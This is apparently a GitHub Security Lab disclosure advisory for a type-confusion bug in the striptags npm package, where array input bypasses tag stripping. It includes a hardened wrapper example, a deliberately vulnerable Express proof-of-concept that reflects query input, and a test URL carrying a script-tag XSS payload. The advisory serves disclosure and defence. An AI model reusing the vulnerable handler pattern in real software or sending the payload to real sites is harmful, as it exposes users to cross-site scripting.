Coordinated Disclosure Timeline

Summary

A type-confusion vulnerability causes striptags to leave dangerous input unsanitized when an attacker can arrange for an array (instead of a string) to be passed to the striptags function.

Product

ericnorris/striptags

Tested Version

v3.1.1

Details

striptags sanitizes input by iterating over the input by index, one character at a time, and tracking whether it is inside a tag. If another indexable object, such as an array of strings, is passed instead of a string, each array element is visited as if it were a single character. A whole string is never equal to "<", so an element that contains tags is copied to the output unchanged and the input is not sanitized.
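To make the failure mode concrete, here is an added example that is not striptags' own code: a deliberately simplified index-based tag stripper (naiveStripTags, a constructed stand-in for the iteration pattern the advisory describes) beside a hardened wrapper that enforces the string contract, and a helper (sanitizeQueryParam, an assumed application-side policy) for query parameters that a query-string parser may have turned into an array.

```javascript
// Added example, not code from striptags. naiveStripTags is a constructed,
// minimal reimplementation of the character-by-character pattern; it is only
// here to show why an array slips through.
function naiveStripTags(html) {
  let output = '';
  let inTag = false;
  // `html.length` and `html[idx]` work for any indexable value, so an array
  // of strings is walked element by element, not character by character.
  for (let idx = 0; idx < html.length; idx++) {
    const char = html[idx];
    if (char === '<') {
      inTag = true;
    } else if (char === '>') {
      inTag = false;
    } else if (!inTag) {
      // For an array element this appends the whole string, tags included.
      output += char;
    }
  }
  return output;
}

// Hardened wrapper: refuse anything that is not a primitive string. Coercing
// with String() would also close the hole, but throwing makes the misuse
// visible during testing instead of silently joining an array with commas.
function safeStripTags(input) {
  if (typeof input !== 'string') {
    throw new TypeError('input must be a string, got ' + typeof input);
  }
  return naiveStripTags(input);
}

// Application-side handling of a query parameter. Query-string parsers such
// as Express's default (qs) turn ?name[]=a&name[]=b into ['a', 'b'], so the
// handler must decide explicitly what to do with an array. Policy chosen
// here (an assumption, not from the advisory): sanitize each element on its
// own and join them, so no element reaches the sanitizer as an unbroken unit.
function sanitizeQueryParam(value) {
  if (Array.isArray(value)) {
    return value.map((v) => safeStripTags(String(v))).join(' ');
  }
  if (value === undefined || value === null) {
    return '';
  }
  return safeStripTags(String(value));
}

// Constructed sample inputs mirroring the advisory's payload.
const html = 'Hello <strong>World</strong>';
const payload = ['Foo', '<script>alert(2)</script>'];

console.log('string input : ' + naiveStripTags(html));        // Hello World
console.log('array input  : ' + naiveStripTags([html]));      // tags intact
console.log('array payload: ' + naiveStripTags(payload));     // script intact
console.log('hardened     : ' + sanitizeQueryParam(payload)); // Foo alert(2)
```

The hardened path is worth keeping even after upgrading the library: the sanitizer's contract is "string in, string out", and the place that knows a value came from a query-string parser is the only place that can decide what an array should mean.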

Proof of concept

The following proof of concept is an Express application that mimics a situation in which an application would be vulnerable. Express's default query-string parser turns name[]=Foo&name[]=... into an array, so req.query.name reaches striptags as an array of strings rather than a string. To test the vulnerability, open the following URL in a browser:

http://localhost:3000/?name[]=Foo&name[]=%3Cscript%3Ealert(2)%3C/script%3E

const util = require('util');
const striptags = require('striptags');

// First a local demonstration of what type confusion can do.
const html = "Hello <strong>World</strong>";
const confused = striptags([html], []); // Wrapping the HTML in an array confuses the striptags function
console.log("Type confused: " + util.inspect(confused)); // Prints 'Hello <strong>World</strong>' with the tags intact: the only "character" visited was the whole string.

// The code below demonstrates how this vulnerability can lead to reflected XSS.
const express = require("express");
const app = express();

// Body parsers, included because they are common in real applications. The array in
// req.query comes from Express's default ("extended", qs-based) query-string parser,
// which turns name[]=a&name[]=b into ['a', 'b'].
app.use(express.json());
app.use(express.urlencoded({
  extended: true
}));

app.get("/", function(req, res) {
  const name = req.query.name;
  console.log(util.inspect(name));
  const stripped = striptags(name, []);

  // This sends the following markup to the browser, which executes the script:
  // `Hello Foo<script>alert(2)</script>!`
  res.send("Hello " + stripped + "!");
});

app.listen(3000, () => {
  console.log("Server started on port 3000");
});

Impact

Cross-site scripting (XSS): attacker-controlled HTML, including script tags, passes through the sanitizer unchanged and is reflected into the response.

CVE

Resources

Credit

This issue was discovered and reported by GitHub team member @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com; please include GHSL-2021-083 in any communication regarding this issue.